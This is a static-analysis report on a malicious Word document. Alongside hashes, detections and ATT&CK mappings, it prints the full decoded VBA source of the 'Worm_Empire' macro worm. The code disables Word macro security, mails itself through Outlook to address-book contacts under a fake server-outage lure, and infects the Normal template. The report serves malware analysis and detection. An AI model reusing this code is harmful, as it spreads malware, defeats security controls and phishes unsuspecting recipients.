Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1dab557a6faaad28…

MALICIOUS

Office (OLE)

Size: 50.0 KB
Created: 2000-02-16 02:09:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a23691f5318da87e1e112c102c25580a
SHA-1: 71cb51c4bc892856873cf639d6bc015c3e59edc1
SHA-256: 1dab557a6faaad285e6d7765110fadd8ba13b38b677adde33c0a85d81c528222
Risk score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1553.005 Mark-of-the-Web Bypass
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The sample contains a VBA macro named 'Worm_Empire' that is executed automatically via the Document_Open event. This macro attempts to disable security features and then uses Outlook to email copies of itself to contacts, acting as a worm. The macro also attempts to write to registry keys related to Office security settings.

Heuristics (5)

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11363 bytes
SHA-256: 41b58a0cfbbc2182fa3f551854e22296407666b29e735495f431e1830916d2e3
Detection: ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Worm_Empire"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
    CommandBars("Tools").Controls("Macro").Enabled = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Options.VirusProtection = False
End If
Dim OLook, APIName, ABook, Off, Y As Integer, X As Integer, Z As Integer
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Security", "ActiveWorm") <> "Worm Empire" Then
    Set OLook = CreateObject("Outlook.Application"): Set APIName = OLook.GetNameSpace("MAPI")
    If OLook = "Outlook" Then
        APIName.Logon "profile", "password"
        For X = 1 To APIName.AddressLists.Count
            Set ABook = APIName.AddressLists(X): Set Off = OLook.CreateItem(0)
            For Y = 1 To ABook.AddressEntries.Count
                Off.Recipients.Add ABook.AddressEntries(Y): If Y > 50 Then Exit For
            Next Y
            Off.Subject = "Extremely URGENT: To All E-Mail User - " & Date
            Off.Body = "This announcement is for all E-MAIL user. Please take note that our E-Mail Server will down and we recommended you to read the document which attached with this E-Mail."
            Off.Attachments.Add ActiveDocument.FullName: Off.Send
        Next X
        APIName.Logoff
    End If
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Security", "ActiveWorm") = "Worm Empire"
End If
Dim AT, NT, AL As Long, NL As Long, CL As Long
Set AT = ActiveDocument.VBProject.VBComponents.Item(1): Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
AL = AT.CodeModule.CountOfLines: NL = NT.CodeModule.CountOfLines
If NT.Name <> "Worm_Empire" Then
    If NL > 0 Then NT.CodeModule.DeleteLines 1, NL
    NT.CodeModule.AddFromString "Private Sub Document_Close()"
    For CL = 2 To AL
        NT.CodeModule.InsertLines CL, AT.CodeModule.Lines(CL, 1)
    Next CL
    NT.Name = "Worm_Empire"
    If ActiveDocument.ReadOnly = False Then
        ActiveDocument.SaveAs ActiveDocument.FullName
    Else
        ActiveDocument.Saved = True
    End If
End If
If AT.Name <> "Worm_Empire" Then
    If AL > 0 Then AT.CodeModule.DeleteLines 1, AL
    AT.CodeModule.AddFromString "Private Sub Document_Open()"
    For CL = 2 To NL
        AT.CodeModule.InsertLines CL, NT.CodeModule.Lines(CL, 1)
    Next CL
    AT.Name = "Worm_Empire"
    If ActiveDocument.ReadOnly = False Then
        ActiveDocument.SaveAs ActiveDocument.FullName
    Else
        ActiveDocument.Saved = True
    End If
End If
If Day(Date) = 10 And Hour(Time) = 10 Then
    For CL = 1 To 5
        ActiveDocument.SaveAs Day(Date) & Month(Date) & Year(Date) & Second(Time) & CL
    Next CL
    With Selection
        .GoTo wdGoToLine, wdGoToAbsolute, 1
        .Font.Size = 40
        .Font.Underline = wdUnderlineWords
        .Font.Italic = True
        .TypeText "Worm! Let's We Enjoy." & Chr(10)
    End With
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/cbd71f045b5c45d6806f71737abc717f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Worm_Empire - 10152 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #3:
' 	LitVarSpecial (False)
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
'
... (truncated)